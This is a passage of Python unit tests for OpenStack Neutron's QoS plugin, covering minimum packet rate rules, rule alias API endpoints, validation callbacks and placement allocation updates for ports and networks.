self.ctxt, _policy.id, new_rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt, id=_policy.id)
def test_create_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.create_policy_minimum_packet_rate_rule,
self.ctxt, self.policy.id, self.rule_data)
def test_update_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.update_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
self._validate_driver_params('update_policy', self.ctxt)
def test_update_policy_rule_check_rule_min_pps_direction_conflict(self):
_policy = self._get_policy()
rules_data = [
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'ingress'
}
},
{
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'egress'
}
},
]
self.rule_data['minimum_packet_rate_rule']['direction'] = 'any'
for rule_data in rules_data:
rules = [
rule_object.QosMinimumPacketRateRule(
self.ctxt, **rules_data[0]['minimum_packet_rate_rule']),
rule_object.QosMinimumPacketRateRule(
self.ctxt, **rules_data[1]['minimum_packet_rate_rule']),
]
setattr(_policy, 'rules', rules)
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy) as mock_qos_get_obj:
self.assertRaises(qos_exc.QoSRuleParameterConflict,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, rule_data['minimum_packet_rate_rule']['id'],
self.policy.id, self.rule_data)
mock_qos_get_obj.assert_called_once_with(self.ctxt,
id=_policy.id)
def test_update_policy_min_pps_rule_bad_policy(self):
_policy = self._get_policy()
setattr(_policy, "rules", [])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
def test_update_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.update_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id,
self.rule_data)
def test_delete_policy_min_pps_rule(self):
_policy = self._get_policy()
setattr(_policy, "rules", [self.min_pps_rule])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.qos_plugin.delete_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id)
self._validate_driver_params('update_policy', self.ctxt)
def test_delete_policy_min_pps_rule_bad_policy(self):
_policy = self._get_policy()
setattr(_policy, "rules", [])
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=_policy):
self.assertRaises(
qos_exc.QosRuleNotFound,
self.qos_plugin.delete_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, _policy.id)
def test_delete_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.delete_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id)
def test_get_policy_min_pps_rule(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_object') as get_object_mock:
self.qos_plugin.get_policy_minimum_packet_rate_rule(
self.ctxt, self.min_pps_rule.id, self.policy.id)
get_object_mock.assert_called_once_with(
self.ctxt, id=self.min_pps_rule.id)
def test_get_policy_min_pps_rules_for_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_objects') as get_objects_mock:
self.qos_plugin.get_policy_minimum_packet_rate_rules(
self.ctxt, self.policy.id)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY, qos_policy_id=self.policy.id)
def test_get_policy_min_pps_rules_for_policy_with_filters(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=self.policy):
with mock.patch('neutron.objects.qos.rule.'
'QosMinimumPacketRateRule.'
'get_objects') as get_objects_mock:
filters = {'filter': 'filter_id'}
self.qos_plugin.get_policy_minimum_packet_rate_rules(
self.ctxt, self.policy.id, filters=filters)
get_objects_mock.assert_called_once_with(
self.ctxt, _pager=mock.ANY,
qos_policy_id=self.policy.id,
filter='filter_id')
def test_get_policy_min_pps_rule_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_packet_rate_rule,
self.ctxt, self.min_pps_rule.id, self.policy.id)
def test_get_policy_min_pps_rules_for_nonexistent_policy(self):
with mock.patch('neutron.objects.qos.policy.QosPolicy.get_object',
return_value=None):
self.assertRaises(
qos_exc.QosPolicyNotFound,
self.qos_plugin.get_policy_minimum_packet_rate_rules,
self.ctxt, self.policy.id)
def test_get_min_pps_rule_type(self):
admin_ctxt = context.get_admin_context()
drivers_details = [{
'name': 'fake-driver',
'supported_parameters': [{
'parameter_name': 'min_kpps',
'parameter_type': lib_constants.VALUES_TYPE_RANGE,
'parameter_range': {'start': 0, 'end': 100}
}]
}]
with mock.patch.object(
qos_plugin.QoSPlugin, "supported_rule_type_details",
return_value=drivers_details
):
rule_type_details = self.qos_plugin.get_rule_type(
admin_ctxt, qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE)
self.assertEqual(
qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE,
rule_type_details['type'])
self.assertEqual(
drivers_details, rule_type_details['drivers'])
def test_get_min_pps_rule_type_as_user(self):
self.assertRaises(
lib_exc.NotAuthorized,
self.qos_plugin.get_rule_type,
self.ctxt, qos_consts.RULE_TYPE_MINIMUM_PACKET_RATE)
class QoSRuleAliasTestExtensionManager(object):
def get_resources(self):
return qos_rules_alias.Qos_rules_alias.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class QoSRuleAliasMinimumPacketRateTestExtensionManager(object):
def get_resources(self):
return qos_pps_minimum_rule_alias.Qos_pps_minimum_rule_alias.\
get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
class TestQoSRuleAlias(test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
def setUp(self):
# Remove MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
plugin = 'ml2'
service_plugins = {'qos_plugin_name': SERVICE_PLUGIN_KLASS}
ext_mgr = QoSRuleAliasTestExtensionManager()
super(TestQoSRuleAlias, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.rule_objects = {
'bandwidth_limit': rule_object.QosBandwidthLimitRule,
'dscp_marking': rule_object.QosDscpMarkingRule,
'minimum_bandwidth': rule_object.QosMinimumBandwidthRule
}
self.qos_policy_id = uuidutils.generate_uuid()
self.rule_data = {
'bandwidth_limit_rule': {'max_kbps': 100,
'max_burst_kbps': 150},
'dscp_marking_rule': {'dscp_mark': 16},
'minimum_bandwidth_rule': {'min_kbps': 10}
}
def _update_rule(self, rule_type, rule_id, **kwargs):
data = {'alias_%s_rule' % rule_type: kwargs}
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_update_request(resource, data, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(self.fmt, res)
def _show_rule(self, rule_type, rule_id):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_show_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(self.fmt, res)
def _delete_rule(self, rule_type, rule_id):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_delete_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
if res.status_int >= webob.exc.HTTPClientError.code:
raise webob.exc.HTTPClientError(code=res.status_int)
@mock.patch.object(qos_plugin.QoSPlugin, "update_policy_rule")
def test_update_rule(self, update_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch(
'neutron.objects.qos.rule.QosRule.get_object',
return_value=rule
), mock.patch.object(self.qos_plugin, 'get_policy_rule',
return_value=rule.to_dict()):
self._update_rule(rule_type, rule_id, **data)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id, {rule_data_name: data}))
update_policy_rule_mock.assert_has_calls(calls, any_order=True)
@mock.patch.object(qos_plugin.QoSPlugin, "get_policy_rule")
def test_show_rule(self, get_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch('neutron.objects.qos.rule.QosRule.get_object',
return_value=rule):
self._show_rule(rule_type, rule_id)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id))
get_policy_rule_mock.assert_has_calls(calls, any_order=True)
@mock.patch.object(qos_plugin.QoSPlugin, "delete_policy_rule")
def test_delete_rule(self, delete_policy_rule_mock):
calls = []
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
rule_data_name = '%s_rule' % rule_type
data = self.rule_data[rule_data_name]
rule = rule_object_class(self.ctxt, id=rule_id,
qos_policy_id=self.qos_policy_id,
**data)
with mock.patch(
'neutron.objects.qos.rule.QosRule.get_object',
return_value=rule
), mock.patch.object(self.qos_plugin, 'get_policy_rule',
return_value=rule.to_dict()):
self._delete_rule(rule_type, rule_id)
calls.append(mock.call(mock.ANY, rule_object_class, rule_id,
self.qos_policy_id))
delete_policy_rule_mock.assert_has_calls(calls, any_order=True)
def test_show_non_existing_rule(self):
for rule_type, rule_object_class in self.rule_objects.items():
rule_id = uuidutils.generate_uuid()
with mock.patch('neutron.objects.qos.rule.QosRule.get_object',
return_value=None):
resource = '%s/alias-%s-rules' % (qos.ALIAS,
rule_type.replace('_', '-'))
request = self.new_show_request(resource, rule_id, self.fmt)
res = request.get_response(self.ext_api)
self.assertEqual(webob.exc.HTTPNotFound.code, res.status_int)
class TestQoSRuleAliasMinimumPacketRate(TestQoSRuleAlias):
def setUp(self):
# Remove MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
plugin = 'ml2'
service_plugins = {'qos_plugin_name': SERVICE_PLUGIN_KLASS}
ext_mgr = QoSRuleAliasMinimumPacketRateTestExtensionManager()
super(TestQoSRuleAlias, self).setUp(plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.rule_objects = {
'minimum_packet_rate': rule_object.QosMinimumPacketRateRule
}
self.qos_policy_id = uuidutils.generate_uuid()
self.rule_data = {
'minimum_packet_rate_rule': {'min_kpps': 10, 'direction': 'any'}
}
class TestQosPluginDB(base.BaseQosTestCase):
PORT_ID = 'f02f160e-1612-11ec-b2b8-bf60ab98186c'
QOS_MIN_BW_RULE_ID = '8bf8eb46-160e-11ec-8024-9f96be32099d'
# uuid -v5 f02f160e-1612-11ec-b2b8-bf60ab98186c
# 8bf8eb46-160e-11ec-8024-9f96be32099d
MIN_BW_REQUEST_GROUP_UUID = 'c8bc1b27-59a1-5135-aa33-aeecad6093f4'
MIN_BW_RP = 'd7bea120-1626-11ec-9148-c32debfcf0f6'
QOS_MIN_PPS_RULE_ID = '6ac5db7e-1626-11ec-8c7f-0b70dbb8a8eb'
# uuid -v5 f02f160e-1612-11ec-b2b8-bf60ab98186c
# 6ac5db7e-1626-11ec-8c7f-0b70dbb8a8eb
MIN_PPS_REQUEST_GROUP_UUID = '995008f4-f120-547a-b051-428b89076067'
MIN_PPS_RP = 'e16161f4-1626-11ec-a5a2-1fc9396e27cc'
def setUp(self):
super(TestQosPluginDB, self).setUp()
self.setup_coreplugin(load_plugins=False)
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["qos"])
manager.init()
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.qos_plugin.driver_manager = mock.Mock()
self.rpc_push = mock.patch('neutron.api.rpc.handlers.resources_rpc'
'.ResourcesPushRpcApi.push').start()
self.context = context.get_admin_context()
self.project_id = uuidutils.generate_uuid()
def _make_qos_policy(self):
qos_policy = policy_object.QosPolicy(
self.context, project_id=self.project_id, shared=False,
is_default=False)
qos_policy.create()
return qos_policy
def _make_qos_minbw_rule(self, policy_id, direction='ingress',
min_kbps=1000, rule_id=None):
rule_id = rule_id if rule_id else uuidutils.generate_uuid()
qos_rule = rule_object.QosMinimumBandwidthRule(
self.context, project_id=self.project_id,
qos_policy_id=policy_id, direction=direction, min_kbps=min_kbps,
id=rule_id)
qos_rule.create()
return qos_rule
def _make_qos_minpps_rule(self, policy_id, direction='ingress',
min_kpps=1000, rule_id=None):
rule_id = rule_id if rule_id else uuidutils.generate_uuid()
qos_rule = rule_object.QosMinimumPacketRateRule(
self.context, project_id=self.project_id,
qos_policy_id=policy_id, direction=direction, min_kpps=min_kpps,
id=rule_id)
qos_rule.create()
return qos_rule
def _make_port(self, network_id, qos_policy_id=None, port_id=None,
qos_network_policy_id=None, device_owner=None):
port_id = port_id if port_id else uuidutils.generate_uuid()
base_mac = ['aa', 'bb', 'cc', 'dd', 'ee', 'ff']
mac = netaddr.EUI(next(net_utils.random_mac_generator(base_mac)))
device_owner = device_owner if device_owner else '3'
port = ports_object.Port(
self.context, network_id=network_id, device_owner=device_owner,
project_id=self.project_id, admin_state_up=True, status='DOWN',
device_id='2', qos_policy_id=qos_policy_id,
qos_network_policy_id=qos_network_policy_id, mac_address=mac,
id=port_id)
port.create()
return port
def _make_network(self, qos_policy_id=None):
network = network_object.Network(self.context,
qos_policy_id=qos_policy_id)
network.create()
return network
def _test_validate_create_network_callback(self, network_qos=False):
net_qos_obj = self._make_qos_policy()
net_qos_id = net_qos_obj.id if network_qos else None
network = self._make_network(qos_policy_id=net_qos_id)
kwargs = {"context": self.context,
"network": network}
with mock.patch.object(self.qos_plugin,
'validate_policy_for_network') \
as mock_validate_policy:
self.qos_plugin._validate_create_network_callback(
"NETWORK", "precommit_create", "test_plugin",
payload=events.DBEventPayload(
self.context, resource_id=kwargs['network']['id'],))
qos_policy = None
if network_qos:
qos_policy = net_qos_obj
if qos_policy:
mock_validate_policy.assert_called_once_with(
self.context, qos_policy, network.id)
else:
mock_validate_policy.assert_not_called()
def test_validate_create_network_callback(self):
self._test_validate_create_network_callback(network_qos=True)
def test_validate_create_network_callback_no_qos(self):
self._test_validate_create_network_callback(network_qos=False)
def _test_validate_create_port_callback(self, port_qos=False,
network_qos=False):
net_qos_obj = self._make_qos_policy()
port_qos_obj = self._make_qos_policy()
net_qos_id = net_qos_obj.id if network_qos else None
port_qos_id = port_qos_obj.id if port_qos else None
network = self._make_network(qos_policy_id=net_qos_id)
port = self._make_port(network.id, qos_policy_id=port_qos_id)
kwargs = {"context": self.context,
"port": {"id": port.id}}
with mock.patch.object(self.qos_plugin, 'validate_policy_for_port') \
as mock_validate_policy:
self.qos_plugin._validate_create_port_callback(
"PORT", "precommit_create", "test_plugin",
payload=events.DBEventPayload(
self.context,
resource_id=kwargs['port']['id'],))
qos_policy = None
if port_qos:
qos_policy = port_qos_obj
elif network_qos:
qos_policy = net_qos_obj
if qos_policy:
mock_validate_policy.assert_called_once_with(
self.context, qos_policy, port)
else:
mock_validate_policy.assert_not_called()
def test_validate_create_port_callback_policy_on_port(self):
self._test_validate_create_port_callback(port_qos=True)
def test_validate_create_port_callback_policy_on_port_and_network(self):
self._test_validate_create_port_callback(port_qos=True,
network_qos=True)
def test_validate_create_port_callback_policy_on_network(self):
self._test_validate_create_port_callback(network_qos=True)
def test_validate_create_port_callback_no_policy(self):
self._test_validate_create_port_callback()
def _prepare_for_port_placement_allocation_change(self, qos1, qos2,
qos_network_policy=None):
qos1_id = qos1.id if qos1 else None
qos2_id = qos2.id if qos2 else None
qos_network_policy_id = (
qos_network_policy.id if qos_network_policy else None)
network = self._make_network(qos_policy_id=qos_network_policy_id)
port = self._make_port(
network.id, qos_policy_id=qos1_id, port_id=TestQosPluginDB.PORT_ID)
return {"context": self.context,
"original_port": {
"id": port.id,
"device_owner": "compute:uu:id",
"qos_policy_id": qos1_id,
"qos_network_policy_id": qos_network_policy_id},
"port": {"id": port.id, "qos_policy_id": qos2_id}}
def test_check_port_for_placement_allocation_change_no_qos_change(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=qos1_obj)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_not_called()
def test_check_port_for_placement_allocation_change(self):
qos1_obj = self._make_qos_policy()
qos2_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=qos2_obj)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos1_obj, qos2_obj, kwargs['original_port'], port)
def test_check_port_for_placement_allocation_change_no_new_policy(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=None)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos1_obj, None, kwargs['original_port'], port)
def test_check_port_for_placement_allocation_change_no_qos_update(self):
qos1_obj = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=qos1_obj, qos2=None)
kwargs['port'].pop('qos_policy_id')
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_not_called()
def test_check_port_for_placement_allocation_change_qos_network_policy(
self):
qos_network = self._make_qos_policy()
desired_qos = self._make_qos_policy()
kwargs = self._prepare_for_port_placement_allocation_change(
qos1=None, qos2=desired_qos, qos_network_policy=qos_network)
context = kwargs['context']
original_port = kwargs['original_port']
port = kwargs['port']
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_port_for_placement_allocation_change(
'PORT', 'before_update', 'test_plugin',
payload=events.DBEventPayload(
context, states=(original_port, port)))
mock_alloc_change.assert_called_once_with(
qos_network, desired_qos, kwargs['original_port'], port)
def test_check_network_for_placement_allocation_change_no_qos_change(self):
qos1 = self._make_qos_policy()
original_network = self._make_network(qos1.id)
network = original_network
ml2plugin_mock = mock.MagicMock()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
mock_alloc_change.assert_not_called()
ml2plugin_mock._make_port_dict.assert_not_called()
def test_check_network_for_placement_allocation_change_no_ports_to_update(
self):
original_qos = self._make_qos_policy()
qos = self._make_qos_policy()
port_qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network(qos.id)
# Port which is not compute bound
self._make_port(network_id=network.id, qos_policy_id=None,
device_owner='uu:id')
# Port with overwritten QoS policy
self._make_port(network_id=network.id, qos_policy_id=port_qos.id,
device_owner='compute:uu:id')
ml2plugin_mock = mock.MagicMock()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
mock_alloc_change.assert_not_called()
ml2plugin_mock._make_port_dict.assert_not_called()
def test_check_network_for_placement_allocation_change_remove_qos(self):
original_qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network()
ml2plugin_mock = mock.MagicMock()
def fake_make_port_dict(port):
return {
'id': port.id,
'device_owner': port.device_owner,
'qos_policy_id': port.qos_policy_id,
'qos_network_policy_id': port.qos_network_policy_id,
}
ml2plugin_mock._make_port_dict.side_effect = fake_make_port_dict
port1 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port1_binding = ports_object.PortBinding(
self.context, port_id=port1.id, host='fake_host1',
vnic_type='fake_vnic_type', vif_type='fake_vif_type',
profile={'allocation': 'fake_allocation'})
port1_binding.create()
port1.bindings = [port1_binding]
port1.update()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
def fake_change_placement_allocation(orig_policy, policy,
orig_port, port):
port['binding:profile'] = {}
mock_alloc_change.side_effect = fake_change_placement_allocation
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
self.assertEqual(ml2plugin_mock._make_port_dict.call_count, 1)
mock_alloc_change_calls = [
mock.call(
original_qos,
None,
{'id': port1.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': None},
mock.ANY),
]
mock_alloc_change.assert_has_calls(mock_alloc_change_calls,
any_order=True)
port1.update()
self.assertDictEqual(port1.bindings[0].profile, {})
def test_check_network_for_placement_allocation_change(self):
original_qos = self._make_qos_policy()
qos = self._make_qos_policy()
original_network = self._make_network(original_qos.id)
network = self._make_network(qos.id)
ml2plugin_mock = mock.MagicMock()
def fake_make_port_dict(port):
return {
'id': port.id,
'device_owner': port.device_owner,
'qos_policy_id': port.qos_policy_id,
'qos_network_policy_id': port.qos_network_policy_id,
}
ml2plugin_mock._make_port_dict.side_effect = fake_make_port_dict
port1 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port1_binding = ports_object.PortBinding(
self.context, port_id=port1.id, host='fake_host1',
vnic_type='fake_vnic_type', vif_type='fake_vif_type', profile={})
port1_binding.create()
port1.bindings = [port1_binding]
port1.update()
port2 = self._make_port(
network_id=network.id, qos_policy_id=None,
device_owner='compute:uu:id')
port2_binding = ports_object.PortBinding(
self.context, port_id=port2.id, host='fake_host2',
vnic_type='fake_vnic_type', vif_type='fake_vif_type', profile={})
port2_binding.create()
port2.bindings = [port2_binding]
port2.update()
with mock.patch.object(
self.qos_plugin,
'_change_placement_allocation') as mock_alloc_change:
def fake_change_placement_allocation(orig_policy, policy,
orig_port, port):
port['binding:profile'] = {'allocation': 'fake_allocation'}
mock_alloc_change.side_effect = fake_change_placement_allocation
self.qos_plugin._check_network_for_placement_allocation_change(
'network', 'after_update', ml2plugin_mock,
payload=events.DBEventPayload(
self.context, states=(original_network, network)))
self.assertEqual(ml2plugin_mock._make_port_dict.call_count, 2)
mock_alloc_change_calls = [
mock.call(
original_qos,
qos,
{'id': port1.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': qos.id},
mock.ANY),
mock.call(
original_qos,
qos,
{'id': port2.id,
'device_owner': 'compute:uu:id',
'qos_policy_id': None,
'qos_network_policy_id': qos.id},
mock.ANY)]
mock_alloc_change.assert_has_calls(mock_alloc_change_calls,
any_order=True)
port1.update()
port2.update()
self.assertDictEqual(
port1.bindings[0].profile, {'allocation': 'fake_allocation'})
self.assertDictEqual(
port2.bindings[0].profile, {'allocation': 'fake_allocation'})
def _prepare_port_for_placement_allocation(self, original_qos,
desired_qos=None,
qos_network_policy=None,
original_min_kbps=None,
desired_min_kbps=None,
original_min_kpps=None,
desired_min_kpps=None,
is_sriov=False):
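        # Build an "original" port whose binding profile already carries the
        # placement allocations for the current QoS rules (optionally with
        # SR-IOV binding details), plus the desired QoS rules, so tests can
        # exercise _change_placement_allocation diffs.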
kwargs = self._prepare_for_port_placement_allocation_change(
original_qos, desired_qos, qos_network_policy=qos_network_policy)
orig_port = kwargs['original_port']
qos = original_qos or qos_network_policy
qos.rules = []
allocation = {}
if original_min_kbps:
qos.rules += [self._make_qos_minbw_rule(
qos.id, min_kbps=original_min_kbps,
rule_id=TestQosPluginDB.QOS_MIN_BW_RULE_ID)]
allocation.update(
{TestQosPluginDB.MIN_BW_REQUEST_GROUP_UUID:
TestQosPluginDB.MIN_BW_RP})
if original_min_kpps:
qos.rules += [self._make_qos_minpps_rule(
qos.id, min_kpps=original_min_kpps,
rule_id=TestQosPluginDB.QOS_MIN_PPS_RULE_ID)]
allocation.update(
{TestQosPluginDB.MIN_PPS_REQUEST_GROUP_UUID:
TestQosPluginDB.MIN_PPS_RP})
if desired_qos:
desired_qos.rules = []
if desired_min_kbps:
desired_qos.rules += [self._make_qos_minbw_rule(
desired_qos.id, min_kbps=desired_min_kbps)]
if desired_min_kpps:
desired_qos.rules += [self._make_qos_minpps_rule(
desired_qos.id, min_kpps=desired_min_kpps)]
binding_prof = {}
if is_sriov:
binding_prof = {
'pci_slot': '0000:42:41.0',
'pci_vendor_info': '8086:107ed',
'physical_network': 'sriov_phy'
}
binding_prof.update({'allocation': allocation})
orig_port.update(
{'binding:profile': binding_prof,
'device_id': 'uu:id'}
)
return orig_port, kwargs['port']
def _assert_pci_info(self, port):
self.assertIn('pci_slot', port['binding:profile'])
self.assertIn('pci_vendor_info', port['binding:profile'])
self.assertIn('physical_network', port['binding:profile'])
def test_change_placement_allocation_increase(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_increase_min_pps(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kpps=1000, desired_min_kpps=2000,
is_sriov=True)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 1000}})
self._assert_pci_info(port)
def test_change_placement_allocation_increase_min_pps_and_min_bw(self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
original_min_kpps=500, desired_min_kpps=1000)
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
consumer_uuid='uu:id',
alloc_diff={
self.MIN_PPS_RP: {
'NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC': 500},
self.MIN_BW_RP: {'NET_BW_IGR_KILOBIT_PER_SEC': 1000}})
def test_change_placement_allocation_change_direction_min_pps_and_min_bw(
self):
qos1 = self._make_qos_policy()
qos2 = self._make_qos_policy()
orig_port, port = self._prepare_port_for_placement_allocation(
qos1, qos2, original_min_kbps=1000, desired_min_kbps=2000,
original_min_kpps=500, desired_min_kpps=1000)
for rule in qos2.rules:
rule.direction = 'egress'
with mock.patch.object(self.qos_plugin._placement_client,
'update_qos_allocation') as mock_update_qos_alloc:
self.qos_plugin._change_placement_allocation(
qos1, qos2, orig_port, port)
mock_update_qos_alloc.assert_called_once_with(
